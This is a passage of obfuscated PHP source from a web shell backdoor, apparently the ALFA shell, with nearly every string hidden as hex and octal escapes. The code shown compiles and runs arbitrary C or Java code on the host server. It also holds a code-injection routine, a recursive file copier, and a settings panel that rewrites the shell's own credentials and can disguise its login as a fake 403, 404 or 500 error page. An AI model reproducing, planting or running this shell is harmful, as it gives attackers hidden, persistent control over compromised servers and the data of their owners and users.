"\74\x66\x6f\x6e\x74\x20\x63\157\154\x6f\162\x3d\x27\147\162\x65\145\x6e\47\76\x5b\40\123\165\143\x63\x65\163\x73\56\56\56\41\40\135\x3c\x2f\x66\x6f\156\164\76"; $err = "\x3c\x66\157\156\164\40\x63\157\154\x6f\x72\75\47\162\x65\x64\47\x3e\x5b\40\106\141\x69\154\x65\x64\x2e\x2e\56\41\x20\135\74\x2f\x66\x6f\x6e\x74\x3e"; if ($evalOptions != '') { $evalOptions = $evalOptions . "\x20"; } if ($evalArguments != '') { $evalArguments = "\40" . $evalArguments; } if ($evalType == "\x63") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq . "\56\x63"; $path = $filename; if (__write_file($path, $evalCode)) { $ext = $GLOBALS["\163\x79\163"] == "\167\151\x6e" ? "\x2e\x65\x78\145" : "\56\x6f\165\x74"; $pathres = $filename . $ext; $evalOptions = "\x2d\157\x20" . $pathres . "\x20" . $evalOptions; $cmd = "\x67\143\x63\40" . $evalOptions . $path; alfaEx($cmd); if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = $pathres . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } elseif ($evalType == "\x6a\141\x76\x61") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { if (preg_match("\57\x63\154\141\163\x73\134\40\50\133\x5e\x7b\x5d\x2b\x29\173\x2f\x69", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq; $evalCode = "\x63\154\141\163\163\40" . $filename . "\40\x7b\40" . $evalCode . "\x20\175\x20"; } $path = $filename . "\x2e\x6a\x61\166\x61"; if (__write_file($path, $evalCode)) { $cmd = "\x6a\x61\x76\x61\143\40" . $evalOptions . $path; alfaEx($cmd); $pathres = $filename . "\x2e\x63\154\x61\163\163"; if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = "\x6a\141\x76\x61\40" . $filename . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } return false; } goto PnxkJ; wK3Iv: function hijackOutput($c = 0, $p = '') { echo $c == 0 ? "\74\x63\145\156\164\x65\x72\x3e\x3c\x66\x6f\x6e\x74\x20\143\157\154\x6f\x72\x3d\47\x67\x72\145\x65\156\x27\76\123\165\x63\x63\145\163\x73\74\57\x66\157\156\x74\76\40\x2d\55\76\40\x70\141\164\150\x3a\40{$p}\74\x2f\143\145\156\x74\145\x72\76" : "\x3c\143\x65\156\164\x65\162\76\x3c\146\x6f\156\x74\40\143\157\x6c\x6f\x72\x3d\42\x72\x65\144\42\x3e\105\x72\162\157\162\x20\x69\156\x20\x69\x6e\x6a\x65\143\164\x20\x63\x6f\144\x65\40\x21\x3c\57\146\x6f\x6e\164\76\x3c\x2f\x63\x65\x6e\164\145\x72\76"; } goto pQYlh; eiihp: function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\57", $f, $d . $s . "\x2f"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto tWrGE; TWvKj: function alfaSettings() { alfahead(); AlfaNum(6, 7, 8, 9, 10); echo "\74\144\151\166\x20\143\154\x61\163\x73\75\150\145\x61\144\x65\x72\x3e\x3c\143\145\x6e\164\x65\x72\76\74\160\x3e\x3c\144\x69\166\40\x63\x6c\x61\x73\x73\75\42\x74\170\x74\146\x6f\156\164\x5f\150\x65\x61\144\x65\162\x22\76\174\x20\x53\145\x74\x74\x69\156\x67\x73\x20\174\74\x2f\144\x69\x76\76\74\x2f\x70\76\x3c\150\63\x3e\x3c\x61\40\150\162\145\146\75\x6a\x61\166\x61\x73\x63\x72\151\x70\164\72\x76\157\151\x64\50\60\51\x20\x6f\x6e\x63\x6c\x69\143\x6b\x3d\42\x67\50\47\x73\145\x74\x74\151\156\147\x73\47\54\x6e\165\x6c\x6c\x2c\x6e\x75\154\x6c\54\x6e\x75\154\x6c\x2c\x6e\165\154\154\54\156\x75\154\x6c\54\x6e\x75\154\x6c\x2c\156\165\154\154\x2c\x6e\165\x6c\x6c\x2c\x27\x6d\141\x69\x6e\47\51\42\x3e\x7c\x20\x47\145\x6e\x65\162\x61\x6c\154\40\123\145\x74\x74\x69\156\x67\40\x7c\x20\x3c\57\x61\76\74\x2f\x68\63\x3e\x3c\57\x63\145\x6e\x74\145\x72\76"; if ($_POST["\141\x6c\146\141\70"] == "\x6d\x61\x69\x6e") { echo "\74\160\x3e\74\143\145\x6e\164\x65\x72\76\x3c\144\x69\x76\x20\x63\154\141\x73\x73\75\42\x74\x78\x74\146\x6f\x6e\x74\137\x68\x65\141\144\x65\162\42\76\174\x20\123\x65\164\x74\151\156\x67\163\x20\174\74\x2f\x64\x69\x76\76\74\57\x70\76\74\x66\157\x72\155\x20\x6f\x6e\123\165\x62\x6d\151\164\75\x22\x72\145\154\x6f\x61\x64\x53\x65\x74\x74\151\x6e\147\x28\x74\x68\x69\163\x29\x3b\162\x65\164\x75\x72\156\40\146\x61\154\x73\x65\73\x22\x20\x6d\145\164\x68\157\x64\75\47\160\157\163\164\47\76"; $lg_array = array("\x30" => "\116\157", "\61" => "\131\145\163"); $penc_array = array("\146\x61\154\163\145" => "\116\157", "\164\162\x75\x65" => "\131\145\x73"); $protect_html = ''; $icon_html = ''; $postEnc_html = ''; $login_html = ''; $cgiapi_html = ''; foreach ($lg_array as $key => $val) { $protect_html .= "\74\157\160\x74\151\157\x6e\40\x76\141\154\x75\145\75\42" . $key . "\x22\40" . ($GLOBALS["\104\102\x5f\x4e\101\115\105"]["\x73\x61\146\x65\x6d\x6f\x64\x65"] == "\x31" ? "\163\x65\154\145\143\164\145\x64" : '') . "\76" . $val . "\74\x2f\157\160\x74\151\157\x6e\x3e"; } foreach ($lg_array as $key => $val) { $icon_html .= "\x3c\x6f\x70\164\x69\x6f\x6e\x20\x76\141\154\165\145\x3d\x22" . $key . "\42\40" . ($GLOBALS["\x44\102\137\x4e\x41\x4d\105"]["\163\150\x6f\167\x5f\x69\143\157\156\163"] == "\61" ? "\163\145\154\x65\143\x74\145\x64" : '') . "\x3e" . $val . "\74\57\x6f\160\164\151\157\156\x3e"; } foreach ($penc_array as $key => $val) { $cgiapi_html .= "\x3c\157\160\164\151\x6f\156\40\x76\141\x6c\x75\x65\x3d\42" . $key . "\x22\40" . (!empty($_POST["\x61\154\x66\141\71"]) && $_POST["\x61\154\x66\141\x39"] == $key ? "\x73\x65\154\145\143\x74\145\x64" : ($GLOBALS["\x44\x42\x5f\116\x41\x4d\105"]["\x63\x67\x69\x5f\141\160\x69"] && empty($_POST["\141\154\146\x61\x39"]) ? "\x73\145\154\145\x63\164\145\x64" : '')) . "\x3e" . $val . "\x3c\x2f\157\x70\164\151\x6f\156\76"; } foreach ($penc_array as $key => $val) { $postEnc_html .= "\x3c\x6f\160\164\151\x6f\x6e\x20\166\x61\154\x75\x65\75\x22" . $key . "\x22\x20" . (!empty($_POST["\141\x6c\x66\141\x37"]) && $_POST["\x61\x6c\x66\141\x37"] == $key ? "\163\x65\x6c\145\x63\164\x65\x64" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["\x61\x6c\146\141\67"]) ? "\x73\x65\x6c\145\143\164\x65\x64" : '')) . "\x3e" . $val . "\74\57\157\x70\x74\x69\157\x6e\76"; } $lg_array = array("\x67\165\151" => "\x47\125\111", "\65\x30\60" => "\x35\x30\60\x20\111\156\164\145\162\156\141\x6c\40\123\145\x72\166\x65\x72\40\105\x72\x72\x6f\162", "\x34\x30\63" => "\x34\60\x33\40\x46\157\162\142\x69\x64\x64\145\156", "\64\x30\x34" => "\x34\x30\64\40\x4e\157\x74\106\x6f\x75\x6e\x64"); foreach ($lg_array as $key => $val) { $login_html .= "\x3c\x6f\x70\x74\151\157\x6e\x20\x76\x61\x6c\x75\x65\x3d\42" . $key . "\x22\40" . ($GLOBALS["\104\102\137\116\101\115\105"]["\x6c\x6f\147\x69\x6e\137\160\x61\x67\x65"] == $key ? "\x73\x65\154\145\x63\x74\x65\144" : '') . "\x3e" . $val . "\x3c\x2f\x6f\160\x74\x69\x6f\156\x3e"; } echo ''; echo "\x3c\164\x61\142\154\145\x20\142\157\x72\x64\145\x72\x3d\42\x31\42\x3e\74\x74\142\157\x64\171\76\x3c\x74\162\x3e\x3c\x74\144\x3e\x3c\144\151\x76\x20\143\x6c\141\163\163\x3d\42\164\142\x6c\164\x78\164\42\40\x73\x74\171\154\x65\x3d\x22\x63\157\154\157\x72\72\x23\106\106\106\x46\106\106\x22\x3e\120\x72\157\x74\145\143\x74\72\x3c\57\144\x69\x76\76\x3c\x2f\164\144\x3e\x3c\x74\144\76\74\x73\x65\x6c\145\x63\164\40\x6e\x61\x6d\x65\75\x22\160\162\x6f\x74\x65\143\x74\42\x20\163\x74\171\x6c\145\75\x22\167\151\x64\x74\150\x3a\61\60\60\45\x3b\42\76" . $protect_html . "\74\57\163\x65\x6c\145\143\164\x3e\74\x2f\x74\144\76\x3c\57\164\x72\x3e\74\x74\162\x3e\x3c\x74\x64\76\74\144\x69\166\x20\143\154\141\x73\163\x3d\x22\164\142\x6c\x74\170\164\42\40\x73\164\x79\x6c\x65\x3d\42\143\x6f\x6c\157\162\x3a\x23\106\106\x46\x46\x46\106\42\76\103\x67\x69\x20\101\160\151\x3a\74\57\x64\151\166\x3e\74\57\x74\144\x3e\74\x74\x64\x3e\x3c\x73\x65\154\x65\x63\x74\x20\156\x61\x6d\145\75\x22\x63\x67\151\137\141\160\x69\x22\40\x73\x74\171\x6c\x65\75\42\167\x69\144\164\x68\x3a\x31\60\x30\45\x3b\x22\x3e" . $cgiapi_html . "\x3c\x2f\x73\145\x6c\145\x63\x74\x3e\74\x2f\164\144\x3e\74\x2f\164\x72\x3e\74\x74\x72\x3e\74\164\144\x3e\x3c\x64\x69\166\40\143\154\x61\x73\163\75\42\x74\x62\x6c\164\170\x74\42\40\x73\x74\171\154\145\x3d\42\143\157\154\157\x72\72\x23\x46\106\106\x46\106\106\42\76\x50\157\163\164\x20\x45\156\143\x72\171\x70\164\x69\157\x6e\x3a\74\57\x64\x69\166\76\x3c\57\x74\x64\x3e\x3c\x74\144\x3e\x3c\163\x65\154\145\143\164\40\156\x61\155\145\75\42\x70\x6f\163\x74\137\x65\x6e\143\x72\171\160\164\42\40\x73\164\171\x6c\145\75\x22\167\x69\144\x74\150\x3a\x31\x30\60\45\73\42\76" . $postEnc_html . "\74\x2f\163\x65\154\145\143\x74\x3e\74\57\x74\x64\x3e\74\x2f\x74\162\x3e\x3c\164\162\x3e\74\x74\144\76\74\144\x69\x76\x20\x63\154\x61\x73\163\75\42\164\x62\x6c\164\x78\164\x22\x20\163\x74\171\154\x65\75\42\x63\157\154\157\x72\x3a\x23\106\x46\106\x46\x46\106\42\76\x53\x68\x6f\x77\x20\x49\143\157\156\163\x3a\x3c\57\x64\x69\x76\x3e\74\57\164\x64\x3e\74\164\144\76\x3c\163\x65\154\x65\x63\x74\x20\x6e\141\155\145\x3d\42\x69\x63\x6f\156\x22\40\163\x74\x79\x6c\145\75\x22\167\x69\144\x74\x68\72\x31\60\60\45\x3b\x22\x3e" . $icon_html . "\x3c\x2f\x73\145\x6c\145\x63\x74\76\x3c\57\x74\x64\76\74\57\164\162\x3e\74\164\162\x3e\x3c\164\x72\x3e\74\164\x64\x3e\74\x64\x69\166\40\x63\154\x61\163\x73\75\x22\x74\142\x6c\x74\170\x74\42\40\163\164\x79\x6c\145\x3d\42\143\x6f\x6c\157\x72\72\43\106\x46\x46\x46\x46\106\42\x3e\154\x6f\147\151\x6e\40\120\x61\147\x65\x3a\74\x2f\144\151\x76\76\x3c\57\x74\144\76\74\164\x64\76\x3c\x73\x65\x6c\145\x63\164\40\x73\164\x79\x6c\145\75\42\x77\151\144\164\x68\72\61\x30\x30\45\x3b\42\40\x6e\x61\155\145\75\42\154\x67\160\x61\x67\x65\42\76" . $login_html . "\x3c\x2f\x73\145\154\x65\x63\x74\x3e\74\57\164\x64\76\x3c\57\x74\162\76\x3c\x74\162\76\74\164\x64\x3e\74\144\x69\x76\40\143\x6c\x61\x73\163\75\42\164\x62\x6c\164\170\164\42\x20\163\x74\x79\154\x65\75\x22\x63\157\x6c\x6f\162\72\43\106\x46\106\106\x46\x46\42\x3e\x55\163\145\x72\116\x61\155\145\72\x3c\57\144\151\x76\76\74\57\164\144\76\74\164\144\76\74\x69\156\160\165\164\40\164\171\160\x65\75\42\164\145\x78\x74\42\x20\163\164\x79\154\x65\75\x22\167\x69\144\x74\x68\x3a\x39\x35\45\x3b\x22\x20\x6e\x61\x6d\145\75\42\165\163\145\x72\156\x61\x6d\145\x22\x20\166\x61\154\165\145\x3d\42" . (empty($_POST["\x61\x6c\146\x61\63"]) ? $GLOBALS["\104\x42\x5f\x4e\101\x4d\105"]["\165\163\x65\162"] : $_POST["\141\x6c\x66\141\63"]) . "\x22\40\x70\154\x61\x63\x65\x68\157\154\144\x65\162\x3d\x22\x73\x6f\x6c\x65\x76\151\163\x69\x62\154\x65\42\76\x3c\57\164\144\76\74\x2f\x74\162\76\x3c\x74\x72\76\x3c\164\144\76\74\x64\151\166\x20\143\x6c\x61\x73\x73\x3d\42\164\x62\154\x74\x78\164\x22\40\x73\164\x79\154\x65\x3d\x22\x63\x6f\154\157\162\x3a\x23\x46\106\106\x46\106\x46\x22\76\120\141\163\x73\167\157\162\144\72\74\57\144\x69\166\x3e\74\57\164\144\x3e\x3c\164\144\x3e\x3c\x69\156\x70\165\x74\x20\x74\171\x70\145\x3d\42\164\145\170\164\42\x20\x73\164\x79\x6c\145\75\x22\167\151\x64\164\x68\x3a\x39\x35\x25\x3b\x22\40\156\141\155\x65\75\42\x70\x61\163\163\167\x6f\x72\144\42\x20\160\x6c\x61\x63\x65\x68\x6f\154\x64\145\x72\75\x22\x2a\52\52\x2a\x2a\42\x3e\x3c\57\x74\x64\x3e\74\x2f\164\162\76\74\57\x74\x62\x6f\144\171\x3e\x3c\57\164\x61\142\154\x65\x3e\74\x69\156\160\x75\x74\40\x74\171\x70\145\x3d\x22\x68\x69\x64\144\145\156\x22\x20\156\141\155\x65\75\x22\x65\42\40\x76\x61\x6c\x75\x65\75\42" . $GLOBALS["\x44\102\x5f\116\x41\115\x45"]["\163\x61\x66\x65\155\157\x64\145"] . "\x22\76\74\151\156\160\165\164\40\x74\x79\160\x65\75\42\150\x69\144\x64\x65\x6e\x22\x20\x6e\x61\155\145\75\x22\163\42\x20\166\141\154\x75\145\75\42" . $GLOBALS["\x44\x42\137\116\x41\x4d\x45"]["\163\150\157\x77\137\x69\143\157\156\163"] . "\x22\x3e\74\160\x3e\x3c\x69\156\160\165\164\x20\164\171\160\145\x3d\42\x73\165\142\x6d\151\x74\x22\x20\156\141\155\145\x3d\x22\142\164\x6e\42\40\166\141\154\x75\145\75\x22\x20\x22\76\74\x2f\160\x3e\x3c\x2f\146\157\162\x6d\76\74\x2f\x63\145\156\x74\145\162\x3e"; if ($_POST["\x61\154\146\x61\65"] == "\x3e\76") { echo __pre(); if (!empty($_POST["\141\x6c\146\141\x33"])) { $protect = $_POST["\x61\x6c\146\141\61"]; $lgpage = $_POST["\x61\154\x66\141\x32"]; $username = $_POST["\x61\x6c\x66\x61\x33"]; $password = md5($_POST["\141\154\146\141\x34"]); $icon = $_POST["\141\154\146\141\66"]; $post_encrypt = $_POST["\x61\x6c\x66\141\67"]; $cgi_api_val = $_POST["\141\154\x66\x61\71"]; @chdir($GLOBALS["\x68\157\155\x65\x5f\x63\167\144"]); $basename = @basename($_SERVER["\120\110\120\137\123\105\114\106"]); $data = @file_get_contents($basename); $user_rand = $GLOBALS["\104\x42\x5f\x4e\x41\x4d\105"]["\165\163\x65\x72\x5f\162\141\x6e\x64"]; $pass_rand = $GLOBALS["\104\102\x5f\x4e\x41\x4d\x45"]["\160\x61\163\x73\137\x72\x61\x6e\x64"]; $login_page_rand = $GLOBALS["\x44\x42\137\x4e\x41\115\x45"]["\154\157\x67\151\156\x5f\x70\x61\x67\x65\137\x72\141\156\144"]; $safemode_rand = $GLOBALS["\104\102\x5f\116\x41\x4d\x45"]["\163\141\146\x65\155\157\x64\x65\137\x72\141\156\x64"]; $show_icons_rand = $GLOBALS["\104\102\137\x4e\101\115\105"]["\163\x68\x6f\x77\x5f\151\143\x6f\x6e\163\x5f\x72\x61\156\144"]; $post_encryption_rand = $GLOBALS["\x44\102\x5f\116\x41\x4d\x45"]["\x70\x6f\x73\164\x5f\145\156\x63\x72\x79\x70\164\151\x6f\x6e\137\x72\141\x6e\x64"]; $cgi_api_rand = $GLOBALS["\x44\x42\137\116\101\115\105"]["\143\x67\151\137\141\160\x69\137\162\141\x6e\144"]; $find_user = "\x2f\x27" . $user_rand . "\47\x28\56\52\x3f\51\x2c\x2f\x69"; $find_pw = "\x2f\47" . $pass_rand . "\x27\x28\x2e\52\77\51\x2c\x2f\x69"; $find_lg = "\x2f\47" . $login_page_rand . "\47\x28\x2e\52\77\x29\x2c\x2f\151"; $find_p = "\x2f\x27" . $safemode_rand . "\x27\50\56\x2a\x3f\51\x2c\57\x69"; $icons = "\57\47" . $show_icons_rand . "\47\x28\56\x2a\77\51\x2c\57\x69"; $postEnc = "\x2f\x27" . $post_encryption_rand . "\x27\x28\56\x2a\x3f\51\54\57\151"; $cgi_api_reg = "\57\47" . $cgi_api_rand . "\x27\50\56\52\77\51\x2c\x2f\151"; if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "\x27" . $user_rand . "\x27\40\75\76\x20\x27" . $username . "\47\54"; $data = str_replace($e[0], $new, $data); } if (!empty($_POST["\x61\x6c\146\141\64"]) && preg_match($find_pw, $data, $e)) { $new = "\47" . $pass_rand . "\47\40\x3d\x3e\40\47" . $password . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "\47" . $login_page_rand . "\47\x20\x3d\76\x20\x27" . $lgpage . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "\47" . $safemode_rand . "\x27\40\75\76\x20\x27" . $protect . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (preg_match($icons, $data, $e)) { $new = "\47" . $show_icons_rand . "\x27\40\x3d\76\x20\47" . $icon . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (preg_match($postEnc, $data, $e)) { $new = "\47" . $post_encryption_rand . "\x27\40\x3d\x3e\x20" . $post_encrypt . "\54"; $data = str_replace($e[0], $new, $data); } if (preg_match($cgi_api_reg, $data, $e)) { $new = "\x27" . $cgi_api_rand . "\x27\x20\x3d\76\x20" . $cgi_api_val . "\x2c"; $data = str_replace($e[0], $new, $data); } if (@file_put_contents($basename, $data)) { echo "\x3c\x62\x3e\125\163\x65\162\116\141\x6d\x65\x3a\40\x3c\x2f\x62\x3e\74\146\x6f\156\164\x20\x63\x6f\x6c\x6f\162\x3d\42\x67\x72\x65\145\x6e\x22\x3e\x3c\142\x3e" . $username . "\74\57\x62\x3e\74\57\x66\x6f\156\164\76\74\x62\x72\x20\x2f\76\74\x62\76\x50\141\x73\x73\x77\157\162\144\72\40\x3c\x2f\x62\76\74\146\x6f\156\164\x20\143\x6f\x6c\x6f\x72\75\x22\x67\162\145\x65\x6e\42\76\x3c\142\x3e" . $_POST["\x61\154\x66\x61\x34"] . "\x3c\x2f\142\x3e\74\57\x66\x6f\156\164\x3e\74\x73\143\162\x69\160\164\x3e\x70\157\x73\164\x5f\x65\x6e\143\x72\171\x70\x74\151\x6f\x6e\137\155\x6f\144\145\40\75\40" . $post_encrypt . "\73\x3c\x2f\x73\x63\x72\151\160\164\x3e"; } else { __alert("\x3c\x73\x70\x61\x6e\x20\x73\164\171\154\145\x3d\x27\143\157\154\x6f\x72\72\162\x65\144\x3b\47\76\x46\x69\154\x65\40\x68\141\x73\40\x6e\157\x20\145\144\151\164\x20\x61\x63\143\145\x73\163\x2e\x2e\56\x21\74\x2f\x73\160\141\156\76"); } } else { __alert("\74\163\160\141\156\x20\x73\x74\171\154\145\x3d\x27\143\x6f\154\157\162\x3a\x72\145\x64\73\47\x3e\125\x73\145\x72\116\x61\x6d\145\40\151\163\40\x45\155\160\164\x79\40\x21\74\57\x73\x70\x61\156\x3e"); } } } elseif ($_POST["\x61\x6c\x66\141\70"] == "\143\157\154\x6f\162") { echo "\74\x63\145\x6e\x74\x65\x72\76\74\x70\x3e\74\144\151\x76\40\143\154\x61\163\163\75\42\164\170\164\x66\x6f\x6e\164\137\x68\145\x61\144\145\x72\42\76\x7c\x20\103\165\163\164\x6f\x6d\40\103\x6f\x6c\157\162\40\174\74\57\144\x69\x76\76\x3c\57\x70\76\74\146\157\162\x6d\x20\x6f\156\123\x75\142\x6d\x69\x74\x3d\42\162\145\x6c\x6f\x61\x64\x43\157\154\157\x72\x73\50\x29\73\162\145\164\165\x72\156\x20\x66\141\154\x73\x65\x3b\42\x20\x6d\145\x74\x68\157\x64\x3d\47\160\157\x73\x74\x27\x3e"; echo "\x3c\x74\141\x62\x6c\x65\40\142\157\x72\x64\145\x72\75\x22\61\x22\x3e\x3c\x74\x62\x6f\144\x79\76"; $template = "\x3c\164\162\76\74\x74\x64\x20\x73\164\x79\x6c\145\75\42\x74\x65\x78\164\55\141\154\x69\147\156\x3a\x63\145\x6e\164\145\x72\73\42\x3e\x3c\x61\x20\150\162\x65\x66\x3d\42\150\164\x74\160\72\x2f\57\163\x6f\x6c\x65\x76\x69\163\151\x62\154\x65\56\143\157\x6d\57\x63\165\x73\x74\157\155\143\157\x6c\157\162\x73\57\x7b\x68\x65\x6c\160\175\56\160\x6e\147\x22\x20\x74\x61\x72\x67\145\164\x3d\x22\x5f\x62\154\x61\x6e\153\x22\x3e\x3c\146\x6f\x6e\164\x20\143\157\x6c\x6f\162\x3d\42\x23\60\60\106\106\x30\60\x22\x3e\110\145\154\x70\x3c\x2f\146\x6f\156\x74\76\x3c\x2f\x61\76\x3c\x2f\164\144\x3e\74\x74\144\x20\163\x74\171\x6c\145\75\x22\x74\x65\x78\164\x2d\x61\154\x69\x67\156\72\143\145\x6e\164\145\x72\73\42\76\x3c\x64\151\166\40\x63\x6c\x61\163\x73\x3d\42\164\142\x6c\164\170\x74\42\x3e\x7b\x69\156\144\145\x78\x7d\x3c\57\x64\151\x76\76\74\57\x74\144\x3e\74\164\x64\76\74\x64\x69\166\x20\143\154\x61\163\x73\75\x22\x74\142\154\x74\x78\164\42\x20\163\164\171\154\145\75\x22\x6d\x61\x72\147\x69\x6e\x2d\x6c\145\146\164\x3a\x35\x70\170\x3b\42\76\x7b\x74\141\x72\147\145\164\x7d\x3a\74\x2f\x64\x69\x76\76\74\x2f\x74\144\x3e\74\x74\144\76\x3c\x69\x6e\x70\x75\164\x20\163\x74\171\x6c\145\x3d\42\167\151\x64\x74\150\x3a\66\x30\x70\x78\73\x22\x20\155\x75\154\x74\151\75\42\x7b\x6d\165\154\164\151\175\x22\x20\x69\144\x3d\x22\x67\x75\151\x5f\x7b\164\x61\x72\x67\x65\164\x7d\42\40\157\x6e\103\150\141\x6e\x67\145\75\x22\x63\157\x6c\x6f\162\110\141\156\144\x6c\145\162\x28\164\x68\151\163\51\73\42\40\x74\x61\x72\x67\145\x74\75\42\56\173\164\141\x72\147\145\164\x7d\x22\40\164\x79\x70\x65\75\42\x63\x6f\154\x6f\162\42\40\166\x61\154\x75\145\75\x22\173\143\x6f\154\157\162\175\42\x3e\74\x2f\x74\144\76\x3c\x74\x64\x3e\74\x69\156\x70\165\164\40\164\x79\160\x65\x3d\42\x74\145\x78\x74\42\x20\163\x74\x79\154\145\x3d\x22\164\145\x78\x74\55\141\154\151\147\156\72\x63\x65\156\164\x65\x72\x3b\x22\40\x6d\165\154\x74\151\x3d\42\x7b\x6d\165\x6c\164\x69\x7d\42\x20\x6f\x6e\x6b\145\171\165\160\75\42\143\157\154\157\x72\x48\x61\x6e\144\154\145\x72\x4b\145\171\x28\164\150\x69\163\x29\x3b\x22\x20\x74\141\162\x67\145\x74\75\42\x2e\x7b\x74\141\162\147\x65\164\x7d\42\40\x69\144\x3d\42\151\x6e\160\x75\164\x5f\x7b\x74\141\162\x67\145\164\175\x22\40\143\x6c\141\163\163\75\42\x63\157\154\157\162\x73\x5f\151\x6e\160\x75\x74\x22\40\x70\154\x61\143\x65\x68\x6f\x6c\x64\145\162\x3d\x22\43\x66\146\x66\146\x66\146\42\x20\166\141\x6c\x75\145\75\x22\x7b\x63\x6f\154\157\x72\175\42\x3e\x3c\x2f\164\x64\76\74\57\164\162\x3e"; $x = 1; foreach ($GLOBALS["\x5f\137\101\x4c\x46\101\x5f\103\117\x4c\x4f\122\137\137"] as $key => $value) { $multi = ''; if (is_array($value)) { if (isset($value["\155\165\154\x74\x69\137\x73\x65\154\x65\x63\x74\157\162"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } $value = alfa_getColor($key); $help = strtolower(str_replace(array("\72", "\x2b"), array("\x5f", "\137\160\x6c\165\163"), $key)); echo str_replace(array("\x7b\151\x6e\144\145\170\175", "\173\164\x61\x72\147\145\164\175", "\x7b\x63\157\x6c\x6f\x72\175", "\x7b\x6d\165\154\164\x69\175", "\173\x68\x65\x6c\160\175"), array($x++, $key, $value, $multi, $help), $template); } echo "\x3c\x74\162\76\x3c\164\144\40\163\x74\171\154\x65\75\x22\164\145\x78\164\55\x61\x6c\x69\147\156\x3a\143\x65\x6e\x74\145\x72\x3b\x22\x3e\55\74\57\x74\144\76\74\164\144\x20\163\x74\x79\154\145\x3d\x22\x74\145\170\x74\55\141\x6c\x69\147\x6e\72\x63\145\156\x74\x65\x72\x3b\x22\x3e\74\144\x69\166\x20\143\x6c\141\163\x73\75\42\164\142\154\x74\170\164\42\x3e\x2a\x3c\57\x64\151\x76\x3e\x3c\x2f\164\144\x3e\x3c\x74\x64\76\74\144\x69\166\x20\x73\x74\x79\154\x65\75\x22\x6d\141\162\147\x69\x6e\x2d\x6c\145\x66\164\x3a\65\160\x78\73\42\40\x63\x6c\x61\163\x73\75\42\164\x62\154\x74\x78\x74\42\x3e\125\163\145\x20\x44\x65\146\141\x75\x6c\x74\x20\x43\x6f\154\157\x72\72\x3c\x2f\x64\151\x76\x3e\74\57\x74\x64\76\x3c\x74\144\76\74\57\x74\x64\x3e\x3c\x74\144\76\x3c\143\x65\156\164\x65\162\x3e\74\x69\156\x70\165\164\x20\164\171\160\x65\x3d\42\x63\150\145\x63\153\x62\157\170\42\40\151\144\x3d\42\165\x73\145\x5f\144\145\x66\x61\x75\154\164\137\143\157\x6c\x6f\162\42\x20\166\141\x6c\x75\145\x3d\x22\61\x22\76\74\x2f\143\145\x6e\164\x65\162\76\x3c\x2f\x74\144\x3e\x3c\57\164\x72\x3e"; echo "\x3c\x2f\x74\x62\157\144\x79\76\74\57\164\141\142\x6c\x65\x3e\74\x70\x3e\x3c\x69\156\160\x75\164\x20\x74\x79\160\145\75\x22\163\165\x62\155\x69\164\42\x20\x6e\141\155\x65\x3d\x22\x62\164\x6e\42\40\166\x61\x6c\165\x65\75\x22\x20\42\x3e\74\57\160\x3e\x3c\x2f\x66\157\162\x6d\76\x3c\160\x3e\74\x62\x75\164\164\157\x6e\40\x73\x74\171\154\x65\75\x22\x70\x61\x64\x64\x69\x6e\147\x3a\64\160\x78\73\x3b\155\x61\162\x67\151\x6e\x2d\162\x69\147\150\x74\x3a\x32\x30\160\170\73\42\40\157\x6e\x63\x6c\x69\143\x6b\x3d\x22\44\50\x27\151\155\x70\157\162\164\x46\x69\x6c\145\102\x74\x6e\x27\x29\56\x63\x6c\151\x63\153\50\x29\x3b\x22\x20\x63\154\141\x73\163\x3d\x22\x62\165\x74\x74\157\156\42\76\x20\111\155\x70\x6f\162\164\x20\74\57\x62\165\x74\x74\157\x6e\x3e\40\x3c\x62\165\164\164\x6f\x6e\40\x73\x74\x79\x6c\x65\x3d\42\x70\x61\144\x64\151\x6e\x67\72\64\160\170\x3b\x6d\141\162\x67\x69\156\x2d\154\145\146\164\x3a\62\x30\x70\170\x3b\x22\x20\x6f\156\143\x6c\151\143\x6b\75\42\x67\50\47\x73\x65\x74\x74\x69\156\147\163\47\x2c\156\x75\154\x6c\x2c\x6e\165\154\154\54\156\165\x6c\x6c\54\x6e\165\154\154\x2c\x6e\165\154\x6c\x2c\156\x75\154\154\x2c\156\x75\154\x6c\54\x27\x65\170\x70\157\x72\164\x27\x2c\47\x63\x6f\x6c\x6f\162\47\x29\x22\40\143\154\x61\x73\x73\x3d\42\142\x75\x74\164\157\x6e\x22\76\40\105\170\x70\157\162\164\40\74\x2f\142\x75\164\x74\x6f\156\76\74\57\x63\145\156\164\x65\162\76\74\x2f\x70\x3e"; if ($_POST["\141\154\x66\141\67"] == "\x65\170\160\157\162\x74") { echo __pre(); $colors = is_array($GLOBALS["\104\102\137\116\101\x4d\x45"]["\143\157\154\157\x72"]) ? $GLOBALS["\x44\x42\137\116\x41\x4d\105"]["\143\x6f\154\157\162"] : array(); $glob_colors = $GLOBALS["\x5f\137\101\114\106\101\137\x43\117\114\117\x52\x5f\137"]; $array = array(); foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? 